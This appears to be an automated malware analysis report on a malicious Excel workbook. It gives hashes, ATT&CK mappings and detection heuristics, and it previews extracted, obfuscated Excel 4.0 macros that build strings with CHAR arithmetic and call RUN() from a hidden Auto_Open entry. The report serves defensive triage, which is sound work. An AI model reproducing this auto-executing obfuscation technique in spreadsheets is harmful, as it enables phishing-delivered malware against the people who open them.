Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e35942318c123c22…

MALICIOUS

Office (OLE)

286.0 KB Created: 2020-05-15 13:14:57 Authoring application: Microsoft Excel First seen: 2020-09-15
MD5: 440b05297e4cc761b5cc6e585080e3a5 SHA-1: 8e25e70dce143ec76588faf78f4a955b667c10b2 SHA-256: e35942318c123c2223894684026754aa0096c94b9c223c6829e7afcbef9e7f44
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains obfuscated Excel 4.0 macros, including an Auto_Open entry, which is a critical indicator of malicious intent. The macros appear to construct a string using character manipulation and then execute it, likely to download and run a secondary payload. The presence of an Auto_Open entry suggests this file was intended to be delivered as a spearphishing attachment.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 126607 bytes
SHA-256: 555b6bcf75a49e471fdf5464563c408386460d27461940b8b1530a9415d21ec5
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!CL25887 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,EF22,"",263.00000000000000000000
'  Sheet,BI25,"",27.00000000000000000000
'  Sheet,FO48,"",-0.68333333333333334814
'  Sheet,GT70,"",-0.18779342723004693871
'  Sheet,IH75,"",0.36936936936936937137
'  Sheet,EN192,"",-22.00000000000000000000
'  Sheet,R213,"",369.00000000000000000000
'  Sheet,DN250,"",14.87500000000000000000
'  Sheet,HN276,"",-100.00000000000000000000
'  Sheet,DG345,"",808.80062499999996816769
'  Sheet,ET352,"",-0.21064814814814813992
'  Sheet,HT433,"",-808.80062499999996816769
'  Sheet,DU439,"",-1.75714285714285711748
'  Sheet,GG445,"FORMULA(CHAR(ER53122*BS45011)&CHAR(IZ61130+FQ46603)&CHAR(ET29808-GS5554)&CHAR(ER53122-DA56752)&CHAR(BV6852/IE19064)&CHAR(ER53122+EV31258)&CHAR(N65144*IT51623)&CHAR(ET29808-DB21644)&CHAR(BL36320+EO21708)&CHAR(DR26242+JE32485)&CHAR(IO43965+CH52454)&CHAR(N65144+O48965)&CHAR(IZ61130*FI57600)&CHAR(IO43965-P12819)&CHAR(N65144/HM5746)&CHAR(B36040+FD6377)&CHAR(N65144-FF65289)&CHAR(DW4723+IC1089)&CHAR(B36040+DM57377)&CHAR(DW4723+DS48527)&CHAR(B36040-FU48567)&CHAR(IZ61130*Q46836)&CHAR(BV6852+FI49969)&CHAR(IZ61130+FW34104)&CHAR(BL36320-FV52596)&CHAR(DW4723*CJ1315)&CHAR(IO43965-CH55770),GG446)",""
'  Sheet,DX446,"SET.VALUE(IO43965,GET.CELL(24,BJ47659)--103.00000000000000000000)",""
'  Sheet,DX447,GOTO(HK5107),""
'  Sheet,GG447,GOTO(DM42011),""
'  Sheet,DG450,"",0.42091836734693877098
'  Sheet,HE452,"",-47.00000000000000000000
'  Sheet,DL487,"",1278.00000000000000000000
'  Sheet,HZ508,"",-4.26315689473684233946
'  Sheet,JQ512,"",742.00000000000000000000
'  Sheet,GF514,"",0.55855855855855851555
'  Sheet,IP515,"",178.00000000000000000000
'  Sheet,IW638,"",131.20000000000001705303
'  Sheet,EI693,"",0.10583153347732181249
'  Sheet,DB730,"",298.00000000000000000000
'  Sheet,IR746,"",300.00000000000000000000
'  Sheet,IH758,"",-2.70329670329670346263
'  Sheet,B762,"",-1.00000000000000000000
'  Sheet,HG825,"",53.75000000000000000000
'  Sheet,Z841,"",-0.38497652582159624934
'  Sheet,EA863,"FORMULA(CHAR(ET29808/DF44466)&CHAR(DR26242*HQ47368)&CHAR(ER53122-EY2760)&CHAR(N65144+DA53522)&CHAR(B36040/IG22530)&CHAR(IZ61130-DD7355)&CHAR(DW4723-GX27915)&CHAR(B36040-DY47451)&CHAR(N65144-EO3098)&CHAR(IZ61130-J52616)&CHAR(ET29808*GW2509)&CHAR(DW4723+BL53174)&CHAR(ET29808/GI28985)&CHAR(ET29808-GR54929)&CHAR(N65144/FZ49866)&CHAR(DR26242+G41686)&CHAR(IO43965/JA18995)&CHAR(IZ61130/HF48136)&CHAR(DR26242-JJ21146)&CHAR(BL36320*GQ23930)&CHAR(N65144-CI29968)&CHAR(ET29808+HQ63790),EA864)",""
'  Sheet,EA865,RUN(EW63151),""
'  Sheet,DC899,"",734.00000000000000000000
'  Sheet,R913,RUN(EZ2986),""
'  Sheet,DX933,"",0.42750929368029738642
'  Sheet,C946,"",-4.55555555555555535818
'  Sheet,IC1089,"",-17.00000000000000000000
'  Sheet,GZ1211,"",1.00000000000000000000
'  Sheet,FR1220,"",1.35999900000000017997
'  Sheet,E1261,"",21.50000000000000000000
'  Sheet,CJ1315,"",0.85483870967741937275
'  Sheet,EW1319,"",-1.00000000000000000000
'  Sheet,EB1346,"",-1.02577319587628856823
'  Sheet,IU1377,"",-0.06929916317991632879
'  Sheet,EC1405,"",1281.00000000000000000000
'  Sheet,EH1442,"",129.00000000000000000000
'  Sheet,GJ1447,"",-332.00000000000000000000
'  Sheet,HG1458,"",133.00000000000000000000
'  Sheet,BF1489,"",305.00000000000000000000
'  Sheet,IJ1598,"",1310.00000000000000000000
'  Sheet,ER1601,"",-47.00000000000000000000
'  Sheet,GO1602,"",0.07569539443684450419
'  Sheet,GX1613,"FORMULA(CHAR(BJ48798+R20324)&CHAR(FB54835-FX25599)&CHAR(HE43819-IQ60379)&CHAR(FX36433-EU30755)&CHAR(DT41768+IU51217)&CHAR(BJ48798*GN35622)&CHAR(DV24154/JS21473)&CHAR(DT41768-DJ10301)&CHAR(DT41768-Q19331)&CHAR(DG54471+FN10173)&CHAR(FD6965*DV8498)&CHAR(DG54471-IV22847)
... (truncated)